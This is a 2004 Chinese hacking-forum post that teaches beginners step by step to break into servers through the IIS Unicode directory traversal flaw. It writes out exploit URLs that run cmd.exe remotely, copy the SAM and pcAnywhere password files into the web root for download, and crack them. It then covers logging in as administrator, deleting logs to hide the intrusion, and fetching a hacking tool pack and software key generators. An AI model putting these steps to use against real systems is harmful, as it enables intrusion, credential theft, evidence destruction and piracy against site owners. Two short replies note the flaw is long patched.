20CN网络安全小组论坛 - 菜鸟乐园 - 一步一步教您用unicode漏洞入侵网站

论坛: 菜鸟乐园标题: 一步一步教您用unicode漏洞入侵网站

作者: newmyth21 [newmyth21]

论坛用户

一步一步教您用unicode漏洞入侵网站

这个漏洞分四种，每一种针对不同语系的系统。分为：%c1%1c、%c0%cf、%c1%pc、%c0%9v。例如第一个 %c1%1c 的问题。c1 1c，中文简体里面没有这种字，照正常的情况根据内码转换文件\winnt\system32\c_936.nls会编码成“？”。但对中文简体版IIS中 c1 1c解码成了（c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路径串中的“..\”之后，所以可以突破IIS路径访问到上级目录。此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，好像台湾繁体中文也受此漏洞影响。美国很多主机上也有这个漏洞，大都分是最后一种%c0%9v。好好利用吧，一步一步跟我来！

一、程序的实现
如果您对一个一个键打入命令不感兴趣的话，您可以直接看第二部分的工具篇，但我建议您还是看一看，使用工具也要用到一些命令的，我尽可能讲得通俗易懂一点。

假设你已经扫描到某台主机xxx.xxx.xxx.xxx有unicode漏洞（至于用什么工具扫描，工具篇中会讲到）打开你的浏览器，键入：
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\

+在这里的意思是空格，也就是说这个命令在本机DOS下是：dir c:（列出远程主机C:\下的所有文件）
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\autoexec.bak

这个命令在本机DOS下是：copy c:\autoexec.bat c:\autoexec.bak（也就是复制远程主机C盘下的autoexec.bat并改名为autoexec.bak）
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\autoexec.bak

这个命令在本机DOS下是： del c:\autoexec.bak（也就是删除远程主机C盘下的autoexec.bak）

接下来的工作就是要把这台服务器NT的密码文件拷贝到网站目录下，为什么要拷贝到网站目录下呢？你有权限下载啊，笨~~~！！！

这又分两种情况，一种是直接用NT管理的机器，它的密码文件是sam._，另一种是用赛门铁克的远程管理软件PCAnyWhere进行远程管理，它的密码文件是*.cif，其实两种密码文件取得的方式都相同，只是得到密码后控制的方式不同罢了。

需要知道网站目录，可以通过ida、idq漏洞进行得到，也可以去寻找网站中的一个图片文件，比如Tscontent.gif文件，然后去查找该文件：使用命令 dir c:\ Tscontent.gif /s，知道目录后，比如为c:\inetpub\wwwroot\，接下来
1、sam._的文件的取得
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\repair\sam._+c:\inetpub\wwwroot\

看懂了吗？把c:\winnt\repair下的sam._复制到c:\inetpub\wwwroot\
接下来，http://xxx.xxx.xxx.xxx/sam._ ，把sam._下载到本地

2、*.cif的取得 http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\*.cif+/s

这是搜索C盘下的cif文件，通常找出来的有Citempl.cif和另一个什么名字的cif文件，一般Citempl.cif为系统默认的密码文件，因此我们需要后者，例如叫SA.CIF，它所在目录为c:\Program Files\pcANYWHERE\DATA，执行： http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\Program Files\pcANYWHERE\DATA\SA.CIF+c:\inetpub\wwwroot\

把c:\Program Files\pcANYWHERE\DATA下的SA.CIF复制到c:\inetpub\wwwroot\

接下来，http://xxx.xxx.xxx.xxx/SA.CIF ，把SA.CIF下载到本地

重要的一点是下载完毕以后记住把c:\inetpub\wwwroot\sam._或c:\inetpub\wwwroot\SA.CIF给删掉，清除你的痕迹！

得到密码文件后
1、sam._文件
sam._的文件的破解工具叫L0phtCrack，工具篇会详细提到，这里就不多说了。执行L0phtCrack并得到Nt Password，比如说是123456，执行：C:\>newletmein \\xxx.xxx.xxx -admin

扫描主机，发现管理员ID是：asdfghjk,执行：C:\>net use \\xxx.xxx.xxx.xxxc$123456 /user:asdfghjk 成功联上对方主机，大功告成！现在你就是root的身份了，为所欲为吧，兄弟！

2、*.cif
*.cif的文件的破解工具叫pcanywherepwd，工具篇会详细提到，这里就不多说了。执行pcanywherepwd并得到PCAnyWhere Password，启动PCAnyWhere登陆主机，又一个管理员出现了，呵呵!

最后记住一点，NT存放日志的目录在：winnt\system32\logfiles，记住毁尸灭迹！

二、工具篇
以下所以工具均能在雨汐网站 http://rainxi.yeah.net/ 的黑客工具中的 unicode完全工具包里找到！（本地下载）

前面我们提到了有工具可以扫描出那些主机有UNICODE漏洞，这个工具叫UNICODE漏洞扫描仪，能扫描指定网段内有UNICODE漏洞的主机，在工具包里为unicode_scanner.zip。界面如图：

很简单吧，填入你想扫描的起始IP和结束IP，让它慢慢扫吧。扫描速度的数值不要填太大，否则很容易出错。

在程序实现篇里讲了那么多难记的命令，您是不是快记不住了，不要紧，DOS您会用吧？下面出场的这个工具叫unicode，它能远程利用unicode漏洞执行类似DOS命令，在工具包里为unicode.zip。界面如图：

在菜单“File”中选择“Connect...”，在弹出的窗口中分别填入所要连接主机的IP和Excute类型，A、B、C、D分别对应%c1%1c、%c0%cf、%c1%pc、%c0%9v。然后OK，然后键入DOS命令，就像操作本机一样简单。

接下来介绍的是两种密码文件的破解工具
1、sam._文件
开始说到了sam._的文件的破解工具叫L0phtCrack，在工具包里为lc252.zip，它的注册机为cr_cllck2.zip，界面如图：

菜单“File-Import SAM File...”，导入sam._文件，菜单“File-Open Password File...”导入字典，菜单“Tools-Run Crack”，开始破解。

大家看到了，实际上这就是一个暴力破解器，要用到字典，时间可能比较长。还有网友来信问我什么是字典，你真是!@#$%,字典是你所猜测密码的组合，格式通常为DIC，TXT，一行一个，破解器会逐行取出测试，直到密码正确和字典用完为止。

这里你可以用本站字典工具中的万能钥匙，它是一个符合中国人习惯的字典生成机。生成的字典大小最好不要大于10Mb，要是字典过大可以用分割软件将其分成几个部分。否则容易死机！！！

2、*.cif
开始说到了*.cif的文件的破解工具叫pcanywherepwd，在工具包里为pcanywherepwd.zip，界面如图：

这个工具的使用就更简单了，导入*.cif文件，点Crack，用户名和密码就得到了。

得到密码后的入侵请看上面的程序实现篇！！！对了，赛门铁克的PCAnyWhere9.2我是在它的主页下的，这个软件有19兆多，我是不可能放上来了，大家到赛门铁克的主页去下吧 http://www.symantec.com/ 具体什么位置我就不记得了，太久了，一定能找得到的！另外我送大家PCAnyWhere的注册机，在工具包里为cr_PC Anywhere92.zip，听说这个软件要卖3000多呢，您呐，就偷着乐吧，哈哈哈哈~~~~！！！

以上所提工具包可在雨汐网 http://rainxi.yeah.net/ 的黑客攻击栏目下载，名称为“unicode完全工具包

地主发表时间: 04-03-23 08:21

回复: newmyth21 [newmyth21]

论坛用户

那个连接偶也不太清楚，原文就是坏的

B1层发表时间: 04-03-23 08:25

回复: wlbyyh [wlbyyh]

论坛用户

现在还用这个？老啦。都打补丁啦。

B2层发表时间: 04-03-23 13:17

论坛: 菜鸟乐园